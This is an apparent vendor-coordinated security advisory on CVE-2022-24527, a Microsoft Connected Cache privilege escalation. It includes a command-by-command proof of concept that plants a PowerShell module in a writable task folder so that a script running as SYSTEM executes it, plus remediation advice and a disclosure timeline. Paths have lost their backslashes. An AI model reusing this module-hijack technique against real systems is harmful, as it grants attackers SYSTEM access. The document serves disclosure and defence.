![CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](https://blog.rapid7.com/content/images/2022/04/ms-connected-cache-vuln.jpg)
On April 12, 2022, Microsoft published [CVE-2022-24527](), a local privilege escalation vulnerability in Microsoft [Connected Cache](). The vulnerability allowed a local low-privileged user to execute arbitrary Powershell as `SYSTEM` due to improper file permission assignment ([CWE-732]()).
## Product description
Connected Cache is a feature used by [Microsoft Endpoint Manager]() [Distribution Points]() to support Delivery Optimization.
## Credit
This issue was discovered and reported by security researcher [Jake Baines]() as part of [Rapid7’s vulnerability disclosure program]().
## Exploitation
When Connected Cache is in use on a Distribution Point, it is installed, in part, into `C:Doinc`. Below, you can see that there are some Powershell scripts within that directory:
C:>dir /s /b C:Doinc
C:DoincProduct
C:DoincProductInstall
C:DoincProductInstallLogs
C:DoincProductInstallTasks
C:DoincProductInstallTasksCacheNodeKeepAlive.ps1
C:DoincProductInstallTasksMaintenance.ps1
C:DoincProductInstallTasksSetDrivesToHealthy.ps1
Low-privileged users only have `read` and `execute` permissions on the Powershell scripts.
C:DoincProductInstallTasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYNETWORK SERVICE:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)
Maintenance.ps1 NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYNETWORK SERVICE:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)
SetDrivesToHealthy.ps1 NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYNETWORK SERVICE:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)
Successfully processed 3 files; Failed processing 0 files
The Powershell scripts are executed every 60 seconds by the Task Scheduler as `NT AUTHORITYSYSTEM`. All that is fine. The following part is where trouble begins. This is how `SetDrivesToHealthy.ps1` starts:
try
{
import-module ‘webAdministration’
$error.clear()
When `SetDrivesToHealthy.ps1` executes, it attempts to load the `webAdministration` module. Before searching the normal %PSModulePath% path, `SetDrivesToHealthy.ps1` looks for the import in `C:DoincProductInstallTasksWindowsPowerShellModuleswebAdministration`. As we saw above, this directory doesn’t exist. And while low-privileged users can’t modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to `C:DoincProductInstallTasks`:
C:DoincProductInstall>icacls ./Tasks/
./Tasks/ NT AUTHORITYSYSTEM:(I)(OI)(CI)(F)
NT AUTHORITYNETWORK SERVICE:(I)(OI)(CI)(F)
BUILTINAdministrators:(I)(OI)(CI)(F)
BUILTINUsers:(I)(OI)(CI)(RX)
BUILTINUsers:(I)(CI)(AD)
BUILTINUsers:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
An attacker can create the necessary directory structure and place their own `webAdministration` so that `SetDrivesToHealthy.ps1` will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file `C:r7`.
C:DoincProductInstallTasks>dir C:
Volume in drive C has no label.
Volume Serial Number is 3073-81A6
Directory of C:
01/04/2022 05:01 PM Doinc
01/04/2022 05:15 PM DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM inetpub
07/07/2021 04:05 AM PerfLogs
01/05/2022 09:29 AM Program Files
01/05/2022 09:29 AM Program Files (x86)
01/05/2022 09:16 AM SCCMContentLib
01/05/2022 09:15 AM SMSPKGC$
01/05/2022 09:17 AM SMSSIG$
01/05/2022 09:17 AM SMS_DP$
01/04/2022 05:04 PM Users
01/04/2022 03:48 PM Windows
0 File(s) 0 bytes
12 Dir(s) 239,837,327,360 bytes free
C:DoincProductInstallTasks>mkdir WindowsPowerShell
C:DoincProductInstallTasks>mkdir WindowsPowerShellModules
C:DoincProductInstallTasks>mkdir WindowsPowerShellModuleswebAdministration
C:DoincProductInstallTasks>echo New-Item C:r7.txt > WindowsPowerShellModuleswebAdministrationwebAdministration.psm1
C:DoincProductInstallTasks>dir C:
Volume in drive C has no label.
Volume Serial Number is 3073-81A6
Directory of C:
01/04/2022 05:01 PM Doinc
01/04/2022 05:15 PM DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM inetpub
01/05/2022 01:49 PM 0 r7.txt
07/07/2021 04:05 AM PerfLogs
01/05/2022 09:29 AM Program Files
01/05/2022 09:29 AM Program Files (x86)
01/05/2022 09:16 AM SCCMContentLib
01/05/2022 09:15 AM SMSPKGC$
01/05/2022 09:17 AM SMSSIG$
01/05/2022 09:17 AM SMS_DP$
01/04/2022 05:04 PM Users
01/04/2022 03:48 PM Windows
1 File(s) 0 bytes
12 Dir(s) 239,836,917,760 bytes free
C:DoincProductInstallTasks>icacls C:r7.txt
C:lol.txt NT AUTHORITYSYSTEM:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:DoincProductInstallTasks>
As you can see, the `C:r7.txt` file is created, demonstrating the privilege escalation.
## Remediation
Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.
## Disclosure timeline
**January 5, 2022:** Issue disclosed to the vendor
**January 5, 2022:** Vendor acknowledgement
**January 6, 2022:** Vendor assigns a case identifier
**January 10-11, 2022:** Vendor and researcher discuss clarifying details
**January 19, 2022:** Vendor confirms the vulnerability
**February-March 2022:** Vendor and researcher coordinate on disclosure date and CVE assignment
**April 12, 2022:** Public disclosure (this document)
_**Additional reading:**_
* _[CVE-2022-1026: Kyocera Net View Address Book Exposure]()_
* _[Analyzing the Attack Landscape: Rapid7s 2021 Vulnerability Intelligence Report]()_
* _[Cloud Pentesting, Pt. 1: Breaking Down the Basics]()_
* _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)]()_
#### NEVER MISS A BLOG
Get the latest stories, expertise, and news about security today.
SubscribeRead More